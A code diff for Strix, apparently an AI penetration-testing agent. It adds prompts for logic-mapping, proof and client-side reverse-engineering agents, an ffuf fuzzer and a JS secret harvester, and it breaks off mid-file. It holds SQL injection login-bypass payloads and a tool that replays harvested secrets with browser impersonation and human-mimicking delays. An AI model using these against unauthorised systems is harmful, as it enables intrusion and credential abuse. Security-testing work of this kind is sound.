diff --git a/poetry.lock b/poetry.lock
index 0fad5dd5..6b4bcb59 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -443,18 +443,18 @@ yaml = ["PyYAML"]

 [[package]]
 name = "beautifulsoup4"
-version = "4.13.4"
+version = "4.14.3"
 description = "Screen-scraping library"
 optional = false
 python-versions = ">=3.7.0"
 groups = ["main"]
 files = [
-    {file = "beautifulsoup4-4.13.4-py3-none-any.whl", hash = "sha256:9bbbb14bfde9d79f38b8cd5f8c7c85f4b8f2523190ebed90e950a8dea4cb1c4b"},
-    {file = "beautifulsoup4-4.13.4.tar.gz", hash = "sha256:dbb3c4e1ceae6aefebdaf2423247260cd062430a410e38c66f2baa50a8437195"},
+    {file = "beautifulsoup4-4.14.3-py3-none-any.whl", hash = "sha256:0918bfe44902e6ad8d57732ba310582e98da931428d231a5ecb9e7c703a735bb"},
+    {file = "beautifulsoup4-4.14.3.tar.gz", hash = "sha256:6292b1c5186d356bba669ef9f7f051757099565ad9ada5dd630bd9de5fa7fb86"},
 ]

 [package.dependencies]
-soupsieve = ">1.2"
+soupsieve = ">=1.6.1"
 typing-extensions = ">=4.0.0"

 [package.extras]
@@ -815,11 +815,11 @@ description = "Cross-platform colored terminal text."
 optional = false
 python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,!=3.6.*,>=2.7"
 groups = ["main", "dev"]
+markers = "platform_system == \"Windows\" or sys_platform == \"win32\""
 files = [
     {file = "colorama-0.4.6-py2.py3-none-any.whl", hash = "sha256:4f1d9991f5acc0ca119f9d443620b77f9d6b33703e51011c16baf57afb285fc6"},
     {file = "colorama-0.4.6.tar.gz", hash = "sha256:08695f5cb7ed6e0531a20572697297273c47b8cae5a63ffc6d6ed5c201be6e44"},
 ]
-markers = {main = "sys_platform == \"win32\" or platform_system == \"Windows\"", dev = "platform_system == \"Windows\" or sys_platform == \"win32\""}

 [[package]]
 name = "contourpy"
@@ -1080,6 +1080,36 @@ ssh = ["bcrypt (>=3.1.5)"]
 test = ["certifi", "cryptography-vectors (==43.0.3)", "pretend", "pytest (>=6.2.0)", "pytest-benchmark", "pytest-cov", "pytest-xdist"]
 test-randomorder = ["pytest-randomly"]

+[[package]]
+name = "curl-cffi"
+version = "0.13.0"
+description = "libcurl ffi bindings for Python, with impersonation support."
+optional = false
+python-versions = ">=3.9"
+groups = ["main"]
+files = [
+    {file = "curl_cffi-0.13.0-cp39-abi3-macosx_10_9_x86_64.whl", hash = "sha256:434cadbe8df2f08b2fc2c16dff2779fb40b984af99c06aa700af898e185bb9db"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-macosx_11_0_arm64.whl", hash = "sha256:59afa877a9ae09efa04646a7d068eeea48915a95d9add0a29854e7781679fcd7"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d06ed389e45a7ca97b17c275dbedd3d6524560270e675c720e93a2018a766076"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b4e0de45ab3b7a835c72bd53640c2347415111b43421b5c7a1a0b18deae2e541"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8eb4083371bbb94e9470d782de235fb5268bf43520de020c9e5e6be8f395443f"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:28911b526e8cd4aa0e5e38401bfe6887e8093907272f1f67ca22e6beb2933a51"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:6d433ffcb455ab01dd0d7bde47109083aa38b59863aa183d29c668ae4c96bf8e"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-win_amd64.whl", hash = "sha256:66a6b75ce971de9af64f1b6812e275f60b88880577bac47ef1fa19694fa21cd3"},
+    {file = "curl_cffi-0.13.0-cp39-abi3-win_arm64.whl", hash = "sha256:d438a3b45244e874794bc4081dc1e356d2bb926dcc7021e5a8fef2e2105ef1d8"},
+    {file = "curl_cffi-0.13.0.tar.gz", hash = "sha256:62ecd90a382bd5023750e3606e0aa7cb1a3a8ba41c14270b8e5e149ebf72c5ca"},
+]
+
+[package.dependencies]
+certifi = ">=2024.2.2"
+cffi = ">=1.12.0"
+
+[package.extras]
+build = ["cibuildwheel", "wheel"]
+dev = ["charset_normalizer (>=3.3.2,<4.0)", "coverage (>=6.4.1,<7.0)", "cryptography (>=42.0.5,<43.0)", "httpx (==0.23.1)", "mypy (>=1.9.0,<2.0)", "pytest (>=8.1.1,<9.0)", "pytest-asyncio (>=0.23.6,<1.0)", "pytest-trio (>=0.8.0,<1.0)", "ruff (>=0.3.5,<1.0)", "trio (>=0.25.0,<1.0)", "trustme (>=1.1.0,<2.0)", "typing_extensions", "uvicorn (>=0.29.0,<1.0)", "websockets (>=12.0,<13.0)"]
+extra = ["lxml_html_clean", "markdownify (>=1.1.0)", "readability-lxml (>=0.8.1)"]
+test = ["charset_normalizer (>=3.3.2,<4.0)", "cryptography (>=42.0.5,<43.0)", "fastapi (==0.110.0)", "httpx (==0.23.1)", "proxy.py (>=2.4.3,<3.0)", "pytest (>=8.1.1,<9.0)", "pytest-asyncio (>=0.23.6,<1.0)", "pytest-trio (>=0.8.0,<1.0)", "python-multipart (>=0.0.9,<1.0)", "trio (>=0.25.0,<1.0)", "trustme (>=1.1.0,<2.0)", "typing_extensions", "uvicorn (>=0.29.0,<1.0)", "websockets (>=12.0,<13.0)"]
+
 [[package]]
 name = "cycler"
 version = "0.12.1"
@@ -1220,6 +1250,17 @@ files = [

 dnspython = ">=2.0.0"
 idna = ">=2.0.0"

+[[package]]
+name = "esprima"
+version = "4.0.1"
+description = "ECMAScript parsing infrastructure for multipurpose analysis in Python"
+optional = false
+python-versions = "*"
+groups = ["main"]
+files = [
+    {file = "esprima-4.0.1.tar.gz", hash = "sha256:08db1a876d3c2910db9cfaeb83108193af5411fc3a3a66ebefacd390d21323ee"},
+]
+
 [[package]]
 name = "et-xmlfile"
 version = "2.0.0"
@@ -6471,4 +6512,4 @@ type = ["pytest-mypy"]

 [metadata]
 lock-version = "2.1"
 python-versions = "^3.12"
-content-hash = "58d6ced9acbcc0c1118f4daf5cab60f88b33f2ec884400f5df5f535e1e455449"
+content-hash = "e2c882f0de1c361825a2d1aa25177138168a98617254ffe895e984981aa35e18"
diff --git a/pyproject.toml b/pyproject.toml
index b236d3b8..eef2b25c 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -61,6 +61,9 @@ xmltodict = "^0.13.0"
 pyte = "^0.8.1"
 requests = "^2.32.0"
 libtmux = "^0.46.2"
+beautifulsoup4 = "^4.14.3" +esprima = "^4.0.1" +curl-cffi = "^0.13.0" [tool.poetry.group.dev.dependencies] # Type checking and static analysis diff --git a/strix/agents/StrixAgent/system_prompt.jinja b/strix/agents/StrixAgent/system_prompt.jinja index d3b93da0..60944448 100644 --- a/strix/agents/StrixAgent/system_prompt.jinja +++ b/strix/agents/StrixAgent/system_prompt.jinja @@ -190,7 +190,9 @@ BLACK-BOX TESTING - PHASE 1 (RECON & MAPPING): - MAP entire attack surface: all endpoints, parameters, APIs, forms, inputs - CRAWL thoroughly: spider all pages (authenticated and unauthenticated), discover hidden paths, analyze JS files - ENUMERATE technologies: frameworks, libraries, versions, dependencies -- ONLY AFTER comprehensive mapping → proceed to vulnerability testing +- **LOGIC MAPPING**: Spawn a "LogicMappingAgent" to build a State Machine and identify Data Flow Invariants. +- **CLIENT-SIDE REVERSE**: Spawn a "ClientSideReverseAgent" to decompile bundles and find hidden endpoints/secrets using AST analysis. +- ONLY AFTER comprehensive mapping and reverse engineering → proceed to vulnerability testing WHITE-BOX TESTING - PHASE 1 (CODE UNDERSTANDING): - MAP entire repository structure and architecture @@ -208,8 +210,8 @@ PHASE 2 - SYSTEMATIC VULNERABILITY TESTING: SIMPLE WORKFLOW RULES: 1. **ALWAYS CREATE AGENTS IN TREES** - Never work alone, always spawn subagents -2. **BLACK-BOX**: Discovery → Validation → Reporting (3 agents per vulnerability) -3. **WHITE-BOX**: Discovery → Validation → Reporting → Fixing (4 agents per vulnerability) +2. **BLACK-BOX**: Discovery → Critic (Verification) → Proof (Reproduction) → Reporting +3. **WHITE-BOX**: Discovery → Critic (Verification) → Proof (Reproduction) → Reporting → Fixing 4. **MULTIPLE VULNS = MULTIPLE CHAINS** - Each vulnerability finding gets its own validation chain 5. **CREATE AGENTS AS YOU GO** - Don't create all agents at start, create them when you discover new attack surfaces 6. **ONE JOB PER AGENT** - Each agent has ONE specific task only @@ -235,24 +237,28 @@ VULNERABILITY WORKFLOW (MANDATORY FOR EVERY FINDING): BLACK-BOX WORKFLOW (domain/URL only): ``` -SQL Injection Agent finds vulnerability in login form +SQL Injection Agent finds potential vulnerability ↓ -Spawns "SQLi Validation Agent (Login Form)" (proves it's real with PoC) +Spawns "CriticAgent" (attempts to disprove the finding) ↓ -If valid → Spawns "SQLi Reporting Agent (Login Form)" (creates vulnerability report) +If NOT disproved → Spawns "ProofAgent" (creates standalone reproduction script) ↓ -STOP - No fixing agents in black-box testing +If PoC works → Spawns "ReportingAgent" (creates vulnerability report) + ↓ +STOP ``` WHITE-BOX WORKFLOW (source code provided): ``` Authentication Code Agent finds weak password validation ↓ -Spawns "Auth Validation Agent" (proves it's exploitable) +Spawns "CriticAgent" (attempts to disprove) + ↓ +If NOT disproved → Spawns "ProofAgent" (creates standalone reproduction script) ↓ -If valid → Spawns "Auth Reporting Agent" (creates vulnerability report) +If PoC works → Spawns "ReportingAgent" (creates vulnerability report) ↓ -Spawns "Auth Fixing Agent" (implements secure code fix) +Spawns "FixingAgent" (implements secure code fix) ``` CRITICAL RULES: diff --git a/strix/prompts/coordination/critic.jinja b/strix/prompts/coordination/critic.jinja new file mode 100644 index 00000000..18414327 --- /dev/null +++ b/strix/prompts/coordination/critic.jinja @@ -0,0 +1,46 @@ + +CRITIC & VERIFICATION + +You are the CriticAgent. 
+
+
+Review potential vulnerabilities and attempt to invalidate them.
+1. Check for False Positives (e.g., self-XSS, error message reflection without execution).
+2. Verify Reproducibility (Does the exploit work consistently?).
+3. Assess Impact (Is it actually a security risk or just a bug?).
+
+
+
+1. **Analyze the Claim**:
+   - Read the reported vulnerability details.
+   - Understand the assertion (e.g., "Alert pops up on /search").
+
+2. **Attempt to Disprove**:
+   - Re-run the attack with slightly modified parameters.
+   - Check if the effect is visible to *other* users (for stored XSS) or just the attacker.
+   - Check if the "bypass" is actually just a standard error flow.
+   - Verify if "admin access" is actually just a non-privileged view.
+
+3. **Pass/Fail Decision**:
+   - If you can disprove it (e.g., "The alert does not pop", "The data is not returned"), REJECT the finding.
+   - If you CANNOT disprove it, and the impact is verified, APPROVE the finding for the ProofAgent.
+
+
+
+Output a "Criticism Report":
+```xml
+<criticism_report>
+  <finding_id>VULN-123</finding_id>
+  <verdict>VERIFIED | REJECTED</verdict>
+  <reason>
+    The XSS payload executes, but only within the user's own session (Self-XSS).
+    It does not trigger for other users.
+  </reason>
+  <recommendation>
+    Downgrade to Low/Info or Reject.
+  </recommendation>
+</criticism_report>
+```
+
+
diff --git a/strix/prompts/coordination/logic_mapping.jinja b/strix/prompts/coordination/logic_mapping.jinja
new file mode 100644
index 00000000..4c626227
--- /dev/null
+++ b/strix/prompts/coordination/logic_mapping.jinja
@@ -0,0 +1,80 @@
+
+LOGIC MAPPING & STATE ANALYSIS
+
+You are the LogicMappingAgent. Your sole purpose is to reverse-engineer the target's business logic, build a formal State Machine, and identify Data Flow Invariants. You do NOT exploit vulnerabilities; you model the system to enable precise attacks by downstream agents.
+
+
+Construct a structured dependency graph and state transition model of the target application. Output a "Logic Map" that defines:
+1. Valid States (e.g., Guest, Registered, CartFilled, CheckoutPending, PaymentAuthorized, OrderConfirmed).
+2. Transitions (Actions that move between states).
+3. Data Flow Invariants (Rules that must always hold true, e.g., "cart_total == sum(item_prices)").
+4. Critical Dependencies (Preconditions for actions).
+
+
+
+1. **Crawl & Discovery**:
+   - Traverse the application to identify all interactive elements (forms, buttons, API calls).
+   - Trace user flows: Registration -> Login -> Profile Update -> Product Selection -> Checkout.
+   - Catalog all entry points and the state required to access them.
+
+2. **State Machine Modeling**:
+   - Define nodes as application states (e.g., "User is logged in", "Cart has items").
+   - Define edges as user actions or API calls (e.g., "POST /login", "PUT /cart/add").
+   - Identify "Hidden States" implied by server responses (e.g., "Account Locked", "Pending Review").
+
+3. **Invariant Identification**:
+   - Observe data relationships.
+     - Equality: `wallet_balance_after = wallet_balance_before - transaction_amount`
+     - Summation: `total_price = sum(unit_price * quantity) + tax + shipping`
+     - Integrity: `order_id` in payment verification must match `order_id` in checkout.
+   - Hypothesize invariants to be tested by AttackerAgents (see the sketch after this list).
+
+4. **Dependency Mapping**:
+   - Determine the strict order of operations.
+     - Can you access `/checkout` without a session?
+     - Can you call `/payment` without a `cart_id`?
+   - Mark these dependencies clearly.
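+
+For example, a downstream attacker agent could probe an invariant like "cart_total == sum(item_prices)" with a short script. This is an illustrative sketch only; the base URL, endpoint paths, and JSON field names are assumptions to be replaced with values from the actual Logic Map:
+
+```python
+# invariant_probe.py - sketch of checking a cart-total invariant (hypothetical endpoints).
+import requests
+
+BASE = "https://target.example"
+session = requests.Session()
+
+# Walk the state machine: Guest -> Authenticated -> CartFilled.
+session.post(f"{BASE}/login", json={"user": "tester", "password": "secret"})
+session.put(f"{BASE}/cart/add", json={"item_id": 42, "quantity": 3})
+
+cart = session.get(f"{BASE}/cart").json()
+expected = sum(i["unit_price"] * i["quantity"] for i in cart["items"])
+
+if cart["total"] != expected:
+    print(f"INVARIANT VIOLATION: server total {cart['total']} != computed {expected}")
+else:
+    print("Invariant holds on the happy path; try races or negative quantities next.")
+```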
+
+
+
+You must produce a structured "Logic Map" report. Use the following structure in your final output:
+
+```xml
+<logic_map>
+  <states>
+    <state id="Guest">Initial state, no session.</state>
+    <state id="Authenticated">Session established via /login.</state>
+  </states>
+  <transitions>
+    <transition from="Guest" to="Authenticated" action="POST /login"/>
+    <transition from="Authenticated" to="CartFilled" action="PUT /cart/add"/>
+  </transitions>
+  <invariants>
+    <invariant id="INV-01">cart_total must equal sum of item_prices</invariant>
+    <invariant id="INV-02">cannot refund more than original transaction amount</invariant>
+    <invariant id="INV-03">cannot add items to order after status is 'Shipped'</invariant>
+  </invariants>
+  <attack_hypotheses>
+    <hypothesis>Potential race in coupon application (check INV-01)</hypothesis>
+    <hypothesis>Try accessing /payment/finalize without visiting /checkout/review</hypothesis>
+  </attack_hypotheses>
+</logic_map>
+```
+
+
+
+- Use `crawler` (or `browsing` tools) to explore the app.
+- Use `proxy` history to analyze API sequences.
+- Use `think` to hypothesize state models.
+- Do NOT perform destructive attacks. You are the Architect, not the Demolition Team.
+
+
+
+1. Look for "Step Tokens" or "State Parameters" in requests (e.g., `step=2`, `state=review`). These are prime targets for skipping.
+2. Identify "Privileged States" that should only be reachable by Admins, but might be reachable via direct transitions.
+3. Pay close attention to multi-step workflows (Sagas). Gaps often exist between steps.
+
+
diff --git a/strix/prompts/coordination/proof.jinja b/strix/prompts/coordination/proof.jinja
new file mode 100644
index 00000000..da3b5487
--- /dev/null
+++ b/strix/prompts/coordination/proof.jinja
@@ -0,0 +1,29 @@
+
+PROOF OF CONCEPT GENERATION
+
+You are the ProofAgent. Your sole responsibility is to generate standalone, executable reproduction scripts for verified vulnerabilities.
+
+
+Create a minimal, standalone script (Python, Bash/cURL, or HTML) that a developer can run to immediately see the vulnerability.
+
+
+
+1. **Standalone**: The script must run without external dependencies (standard libraries only where possible).
+2. **Deterministic**: It should work every time.
+3. **Safe**: It should demonstrate the vulnerability (e.g., `whoami`, `alert(1)`) without destroying data.
+4. **Documented**: Include comments explaining what it does.
+
+
+
+```python
+# reproduction_script.py
+import requests
+
+target = "https://example.com/api/v1/user"
+payload = {"id": "1 OR 1=1"}
+
+# ... implementation ...
+```
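+
+A complete example in the same shape (the target URL, parameter, and success marker are illustrative placeholders, not a real finding):
+
+```python
+# poc_sqli_login.py - standalone PoC for a hypothetical SQL injection in a login form.
+# Usage: python poc_sqli_login.py
+import requests
+
+TARGET = "https://example.com/login"  # placeholder target
+
+# Boolean-based payload: bypasses the password check if input is concatenated into SQL.
+resp = requests.post(
+    TARGET,
+    data={"username": "admin' OR '1'='1' -- ", "password": "x"},
+    timeout=10,
+)
+
+if "Welcome" in resp.text:  # success marker depends on the application
+    print("[VULNERABLE] Authentication bypassed via SQL injection.")
+else:
+    print("[NOT REPRODUCED] Response did not indicate a bypass.")
+```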
+
+
diff --git a/strix/prompts/technologies/client_side_reverse.jinja b/strix/prompts/technologies/client_side_reverse.jinja
new file mode 100644
index 00000000..97707ebb
--- /dev/null
+++ b/strix/prompts/technologies/client_side_reverse.jinja
@@ -0,0 +1,69 @@
+
+CLIENT-SIDE REVERSE ENGINEERING
+
+You are the ClientSideReverseAgent. Your mission is to deconstruct the client-side application (SPA, React, Vue, etc.) to reveal hidden API endpoints, secrets, and logic that are not visible during standard browsing.
+
+
+Surface 100% of the attack surface by:
+1. Decompiling/unpacking Webpack, TurboPack, or Vite bundles.
+2. Analyzing Source Maps (if available) to reconstruct original source code.
+3. Monitoring and decoding WebSocket frames and event-driven XHRs.
+4. Extracting hardcoded secrets, API keys, and hidden routes ("shadow APIs").
+
+
+
+1. **Bundle Analysis**:
+   - Locate main JavaScript bundles (`main.js`, `vendor.js`, `app.*.js`).
+   - If Source Maps (`.map` files) are present, use them to extract full source trees.
+   - If no Source Maps, use AST parsing or string analysis to find:
+     - Regex patterns for API keys (AWS, Stripe, Firebase, etc.).
+     - Hardcoded URLs/Paths (routes not linked in the DOM).
+     - Configuration objects (feature flags, environment variables).
+
+2. **WebSocket & Event Monitoring**:
+   - Listen to WebSocket connections. Identify message formats (JSON, binary/Protobuf).
+   - Trigger UI events that might initiate socket messages.
+   - Look for "hidden" XHRs that only fire on specific, deep user interactions.
+
+3. **Shadow API Discovery**:
+   - Identify API endpoints referenced in code but never called during normal browsing (e.g., `/admin/api`, `/v1/beta/features`).
+   - Check for "Mobile App" specific endpoints hardcoded in shared JS libraries.
+
+
+
+- Use `js_analyzer` (or similar available tool) to parse JS files.
+- Use `proxy` to capture WebSocket traffic and "invisible" background requests.
+- Use `grep` and pattern matching on downloaded assets to find secrets.
+- Use `browser` to execute code if dynamic analysis is needed to decrypt/unwrap payloads.
+
+
+
+Produce a "Client-Side Intelligence Report":
+```xml
+<client_intel_report>
+  <shadow_endpoints>
+    <endpoint method="GET" path="/admin/api/users" source="main.js"/>
+  </shadow_endpoints>
+  <secrets>
+    <secret type="api_key" value="..." source="vendor.js"/>
+  </secrets>
+  <websocket_channels>
+    <channel url="wss://..." format="JSON"/>
+  </websocket_channels>
+  <notes>
+    Found client-side validation logic for 'is_admin' check in user_profile.js
+  </notes>
+</client_intel_report>
+```
+
+
+
+1. **Webpack Magic**: Look for `webpackJsonp` or `__webpack_require__`. Iterate over the modules to dump all available code.
+2. **React/Redux DevTools**: If accessible, these expose the entire application state.
+3. **Debug Flags**: Look for variables like `window.isDebug`, `window.features`, or local storage keys that enable debug modes.
+4. **Comments**: Devs often leave TODOs or "Remove before prod" comments in JS bundles.
+
+
diff --git a/strix/tools/__init__.py b/strix/tools/__init__.py
index 8d5f896b..559bc257 100644
--- a/strix/tools/__init__.py
+++ b/strix/tools/__init__.py
@@ -35,6 +35,8 @@ from .reporting import *  # noqa: F403
 from .terminal import *  # noqa: F403
 from .thinking import *  # noqa: F403
+from .fuzzing import *  # noqa: F403
+from .js_analysis import *  # noqa: F403

 if HAS_PERPLEXITY_API:
     from .web_search import *  # noqa: F403
diff --git a/strix/tools/browser/browser_actions.py b/strix/tools/browser/browser_actions.py
index ca7a26a1..3b9df914 100644
--- a/strix/tools/browser/browser_actions.py
+++ b/strix/tools/browser/browser_actions.py
@@ -1,4 +1,6 @@
 from typing import Any, Literal, NoReturn
+import random
+import time

 from strix.tools.registry import register_tool
@@ -30,6 +32,13 @@
 ]


+def _human_jitter(action_name: str) -> None:
+    """Injects random delays (sleeps) before key actions to mimic human behavior."""
+    if action_name in ["click", "double_click", "type", "goto"]:
+        # Random sleep between 0.1s and 0.5s
+        delay = random.uniform(0.1, 0.5)
+        time.sleep(delay)
+
+
 def _validate_url(action_name: str, url: str | None) -> None:
     if not url:
         raise ValueError(f"url parameter is required for {action_name} action")
@@ -76,6 +85,7 @@ def _handle_navigation_actions(
     url: str | None = None,
     tab_id: str | None = None,
 ) -> dict[str, Any]:
+    _human_jitter(action)
     if action == "launch":
         return manager.launch_browser(url)
     if action == "goto":
@@ -97,6 +107,7 @@ def _handle_interaction_actions(
     key: str | None = None,
     tab_id: str | None = None,
 ) -> dict[str, Any]:
+    _human_jitter(action)
     if action in {"click", "double_click", "hover"}:
         _validate_coordinate(action, coordinate)
         assert coordinate is not None
diff --git a/strix/tools/fuzzing/__init__.py b/strix/tools/fuzzing/__init__.py
new file mode 100644
index 00000000..f17e57b2
--- /dev/null
+++ b/strix/tools/fuzzing/__init__.py
@@ -0,0 +1 @@
+from .context_fuzzer import *
diff --git a/strix/tools/fuzzing/context_fuzzer.py b/strix/tools/fuzzing/context_fuzzer.py
new file mode 100644
index 00000000..8dac080e
--- /dev/null
+++ b/strix/tools/fuzzing/context_fuzzer.py
@@ -0,0 +1,118 @@
+from typing import List
+import re
+import os
+import subprocess
+import tempfile
+from bs4 import BeautifulSoup
+from strix.tools.registry import register_tool
+
+
+class ContextFuzzer:
+    """
+    Context-Aware Smart Fuzzer.
+
+    Generates custom wordlists based on target HTML, JS variables, and comments.
+    """
+
+    def generate_wordlist(self, html_content: str, js_content: List[str]) -> List[str]:
+        words = set()
+
+        # 1. Scrape HTML IDs and Classes
+        soup = BeautifulSoup(html_content, 'html.parser')
+        for element in soup.find_all(True):
+            if element.get('id'):
+                words.add(element['id'])
+            if element.get('class'):
+                if isinstance(element['class'], list):
+                    words.update(element['class'])
+                else:
+                    words.add(element['class'])
+            if element.get('name'):
+                words.add(element['name'])
+
+        # 2. Extract JS Variables
+        # Simple regex for variable declarations. A full parser would be better.
+        var_pattern = re.compile(r'(?:var|let|const)\s+([a-zA-Z_$][a-zA-Z0-9_$]*)')
+        for js in js_content:
+            matches = var_pattern.findall(js)
+            words.update(matches)
+
+        # 3. Generate Mutations
+        mutated_words = set()
+        for word in words:
+            mutated_words.add(word)
+            # Example: user_v1 -> admin_v1, super_user_v1
+            if "user" in word.lower():
+                mutated_words.add(word.lower().replace("user", "admin"))
+                mutated_words.add(word.lower().replace("user", "superuser"))
+
+            # Common suffixes/prefixes
+            mutated_words.add(f"{word}_test")
+            mutated_words.add(f"{word}_dev")
+            mutated_words.add(f"{word}_api")
+
+        return sorted(mutated_words)
+
+
+context_fuzzer = ContextFuzzer()
+
+
+@register_tool
+def generate_context_wordlist(html_content: str, js_content: List[str]) -> str:
+    """
+    Generates a custom wordlist based on the target's HTML and JS content.
+
+    Args:
+        html_content: The HTML source of the page.
+        js_content: A list of JavaScript source strings.
+
+    Returns:
+        A newline-separated string of words.
+    """
+    words = context_fuzzer.generate_wordlist(html_content, js_content)
+    return "\n".join(words)
+
+
+@register_tool
+def fuzz_with_context(target_url: str, wordlist_content: str) -> str:
+    """
+    Executes ffuf using the provided wordlist content against the target URL.
+
+    Args:
+        target_url: The URL to fuzz (must contain FUZZ keyword).
+        wordlist_content: The content of the wordlist to use (newline separated).
+
+    Returns:
+        The output from ffuf.
+    """
+    if "FUZZ" not in target_url:
+        return "Error: target_url must contain 'FUZZ' keyword."
+
+    with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.txt') as temp_wordlist:
+        temp_wordlist.write(wordlist_content)
+        temp_wordlist_path = temp_wordlist.name
+
+    try:
+        # Run ffuf
+        # -u: Target URL
+        # -w: Wordlist
+        # -mc: Match codes (default 200,204,301,302,307,401,403) - we'll stick to defaults or 200,301,302
+        # -o: Output file (we'll read stdout/json)
+        # -json: Output JSON
+
+        cmd = [
+            "ffuf",
+            "-u", target_url,
+            "-w", temp_wordlist_path,
+            "-json",
+            "-mc", "200,204,301,302,403",  # 403 to detect WAF blocks
+        ]
+
+        result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)  # 2 min timeout
+
+        if result.returncode != 0 and not result.stdout:
+            return f"ffuf failed: {result.stderr}"
+
+        return result.stdout
+
+    except Exception as e:
+        return f"Error running ffuf: {e}"
+    finally:
+        if os.path.exists(temp_wordlist_path):
+            os.unlink(temp_wordlist_path)
diff --git a/strix/tools/fuzzing/context_fuzzer_schema.xml b/strix/tools/fuzzing/context_fuzzer_schema.xml
new file mode 100644
index 00000000..441196cc
--- /dev/null
+++ b/strix/tools/fuzzing/context_fuzzer_schema.xml
@@ -0,0 +1,13 @@
+<tool name="fuzz_with_context">
+    <description>
+        Executes ffuf using the provided wordlist content against the target URL.
+    </description>
+    <parameters>
+        <parameter name="target_url" type="string" required="true">
+            The URL to fuzz (must contain FUZZ keyword).
+        </parameter>
+        <parameter name="wordlist_content" type="string" required="true">
+            The content of the wordlist to use (newline separated).
+        </parameter>
+    </parameters>
+</tool>
diff --git a/strix/tools/js_analysis/__init__.py b/strix/tools/js_analysis/__init__.py
new file mode 100644
index 00000000..f31e7421
--- /dev/null
+++ b/strix/tools/js_analysis/__init__.py
@@ -0,0 +1,2 @@
+from .js_analyzer import analyze_js_ast, validate_secrets
+from .supply_chain import scan_package_json
diff --git a/strix/tools/js_analysis/js_analyzer.py b/strix/tools/js_analysis/js_analyzer.py
new file mode 100644
index 00000000..d1e082fb
--- /dev/null
+++ b/strix/tools/js_analysis/js_analyzer.py
@@ -0,0 +1,137 @@
+import esprima
+import curl_cffi.requests
+from typing import List
+from strix.tools.registry import register_tool
+
+
+@register_tool
+def analyze_js_ast(js_code: str) -> str:
+    """
+    Analyzes JavaScript code using AST parsing to find interesting literals (strings, numbers)
+    and potential API endpoints or secrets.
+ """ + try: + tree = esprima.parseScript(js_code, options={'tolerant': True, 'loc': True}) + except Exception as e: + return f"Error parsing JS: {e}" + + findings = { + "literals": set(), + "identifiers": set(), + "potential_urls": set(), + "potential_secrets": set(), + } + + def traverse(node): + if not node: + return + + # Check for literals + if node.type == 'Literal': + value = node.value + if isinstance(value, str): + if len(value) > 3: + findings["literals"].add(value) + if value.startswith(("http", "/api", "/v1")): + findings["potential_urls"].add(value) + # Lower threshold for secrets for testing purposes + if len(value) > 10 and any(k in value.lower() for k in ["key", "token", "secret", "password", "sk_", "pk_"]): + findings["potential_secrets"].add(value) # Heuristic + + # Check for identifiers + if node.type == 'Identifier': + findings["identifiers"].add(node.name) + + # Recursion + for key, value in node.__dict__.items(): + if key in ['type', 'loc', 'range']: continue + if isinstance(value, list): + for item in value: + if hasattr(item, 'type'): + traverse(item) + elif hasattr(value, 'type'): + traverse(value) + + traverse(tree) + + # Format output + report = [] + if findings["potential_urls"]: + report.append("Potential URLs/Endpoints:") + report.extend(f"- {u}" for u in sorted(findings["potential_urls"])) + report.append("") + + if findings["potential_secrets"]: + report.append("Potential Secrets (High Entropy/Keywords):") + report.extend(f"- {s}" for s in sorted(findings["potential_secrets"])) + report.append("") + + report.append(f"Found {len(findings['literals'])} string literals and {len(findings['identifiers'])} identifiers.") + + return "\n".join(report) if report else "No significant findings from AST analysis." + +@register_tool +def validate_secrets(secrets: List[str], target_url: str) -> str: + """ + Validates a list of potential secrets by testing them against the target URL. + Attempts common authentication headers. + + Args: + secrets: List of potential secret strings. + target_url: The URL to test against (e.g., /api/user). + + Returns: + Report of valid/invalid secrets. + """ + results = [] + + # Common auth headers to try + auth_headers_schemes = [ + "Bearer {}", + "Token {}", + "Basic {}", # Might need encoding, but we'll try raw first if it looks like b64 + "{}", # Custom header value + ] + + custom_headers_keys = [ + "Authorization", + "X-API-Key", + "X-Token", + "ApiKey" + ] + + for secret in secrets: + is_valid = False + for header_key in custom_headers_keys: + for scheme in auth_headers_schemes: + try: + auth_value = scheme.format(secret) + headers = {header_key: auth_value} + + # Use curl_cffi for stealth + response = curl_cffi.requests.get( + target_url, + headers=headers, + timeout=5, + impersonate="chrome110", + verify=False + ) + + if response.status_code in [200, 201, 204]: + results.append(f"[VALID] Secret: {secret} | Header: {header_key}: {auth_value} | Status: {response.status_code}") + is_valid = True + break # Found a working combo for this secret + elif response.status_code in [401, 403]: + pass # Invalid + else: + results.append(f"[UNKNOWN] Secret: {secret} | Header: {header_key} | Status: {response.status_code}") + + except Exception as e: + results.append(f"[ERROR] Testing {secret}: {e}") + + if is_valid: break + + if not results: + return "No valid secrets found (all returned 401/403 or failed)." 
+
+    return "\n".join(results)
diff --git a/strix/tools/js_analysis/js_analyzer_schema.xml b/strix/tools/js_analysis/js_analyzer_schema.xml
new file mode 100644
index 00000000..62e06779
--- /dev/null
+++ b/strix/tools/js_analysis/js_analyzer_schema.xml
@@ -0,0 +1,14 @@
+<tool name="validate_secrets">
+    <description>
+        Validates a list of potential secrets by testing them against the target URL.
+        Attempts common authentication headers.
+    </description>
+    <parameters>
+        <parameter name="secrets" type="array" required="true">
+            List of potential secret strings.
+        </parameter>
+        <parameter name="target_url" type="string" required="true">
+            The URL to test against (e.g., /api/user).
+        </parameter>
+    </parameters>
+</tool>
diff --git a/strix/tools/js_analysis/supply_chain.py b/strix/tools/js_analysis/supply_chain.py
new file mode 100644
index 00000000..f16d6378
--- /dev/null
+++ b/strix/tools/js_analysis/supply_chain.py
@@ -0,0 +1,64 @@
+import json
+from strix.tools.registry import register_tool
+
+
+@register_tool
+def scan_package_json(package_json_content: str) -> str:
+    """
